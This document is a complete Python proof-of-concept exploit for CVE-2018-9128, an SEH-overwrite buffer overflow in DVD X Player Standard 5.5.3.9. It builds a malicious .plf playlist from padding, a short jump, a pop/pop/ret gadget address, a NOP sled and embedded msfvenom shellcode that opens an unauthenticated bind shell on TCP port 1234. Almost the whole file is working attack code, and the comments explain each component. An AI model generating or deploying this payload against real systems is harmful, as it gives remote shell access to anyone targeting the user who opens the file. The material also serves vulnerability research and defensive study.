######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################

# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of python file: 1710 bytes


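# SEH-overwrite PoC for DVD X Player Standard 5.5.3.9 (CVE-2018-9128).
# Layout of the crafted .plf:  padding | nSEH | SEH | NOP sled | shellcode.
# Every offset and address below is target-specific and comes from the
# original crash analysis; none of it is expected to survive a different
# build of the player or a different module base.
OUTPUT_FILE = "exploit_dvdx_player_standard_5.5.3.9.plf"

# Bytes of 'A' needed to reach the SEH record on the stack.
PADDING_LEN = 608
# Bytes of 0x90 placed after the SEH record; the short jump lands in here.
NOP_SLED_LEN = 100

# Bad characters the shellcode was encoded to avoid (see the msfvenom -b
# argument in the header). They are treated here as unsafe anywhere in the
# buffer, not just in the shellcode — confirm against the playlist parser
# if a future payload or gadget address needs one of them.
BAD_CHARS = b"\x00\x0a\x0d\x1a"

# nSEH: `jmp short +6` (EB 06) hops over the 4-byte handler address that
# follows and lands at the start of the NOP sled. The two trailing NOPs are
# only filler so the record stays 4 bytes wide.
NEXT_SEH = b"\xeb\x06\x90\x90"

# SEH handler: pop/pop/ret gadget at 0x025F13BC in EchoDelayProcess.dll,
# written little-endian. Hard-coded, so it is only valid where that module
# loads at the same base. The header says it was tested on Windows XP SP3
# x86; on a platform that rebases the module (ASLR) or compiles it with
# SafeSEH this address will not work and the PoC will just crash the player.
SEH_HANDLER = b"\xbc\x13\x5f\x02"

# msfvenom windows/shell_bind_tcp, EXITFUNC=seh, LPORT=1234,
# x86/shikata_ga_nai, 355 bytes (see the header for the exact command).
# NOTE: this is a *bind* shell. When it runs, the target listens on TCP/1234
# with no authentication, so anyone who can reach that port gets the shell.
# Only open the generated file on an isolated lab host.
SHELLCODE = (
    b"\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31"
    b"\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a"
    b"\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a"
    b"\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8"
    b"\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3"
    b"\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9"
    b"\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21"
    b"\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98"
    b"\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1"
    b"\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05"
    b"\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65"
    b"\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40"
    b"\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5"
    b"\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb"
    b"\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a"
    b"\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20"
    b"\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f"
    b"\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d"
    b"\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05"
    b"\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f"
    b"\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78"
    b"\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07"
    b"\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8"
    b"\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5"
    b"\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e"
    b"\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49"
    b"\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7"
    b"\xbe\xde\x84\xf2"
)


def build_payload() -> bytes:
    """Return the full .plf contents: padding | nSEH | SEH | NOP sled | shellcode.

    Returns:
        The assembled buffer as bytes (608 + 4 + 4 + 100 + 355 bytes).

    Raises:
        ValueError: if any byte from BAD_CHARS appears in the assembled
            buffer — that would mean the shellcode or a gadget address was
            not generated with the bad-character list the target needs.
    """
    payload = b"".join((
        b"\x41" * PADDING_LEN,
        NEXT_SEH,
        SEH_HANDLER,
        b"\x90" * NOP_SLED_LEN,
        SHELLCODE,
    ))
    # Cheap sanity check before handing the file to a target: a single bad
    # byte here silently truncates or mangles the buffer in the parser.
    present = set(BAD_CHARS) & set(payload)
    if present:
        raise ValueError(
            "payload contains bad characters: "
            + ", ".join(f"0x{b:02x}" for b in sorted(present))
        )
    return payload


def main() -> None:
    """Write the crafted playlist to OUTPUT_FILE in the current directory."""
    # Binary mode is required: the original opened the file in text mode and
    # wrote str escapes, which only produces raw bytes under Python 2. Under
    # Python 3 every byte >= 0x80 would be UTF-8 encoded into two bytes and
    # the shellcode and gadget address would be corrupted.
    with open(OUTPUT_FILE, "wb") as out:
        out.write(build_payload())


if __name__ == "__main__":
    main()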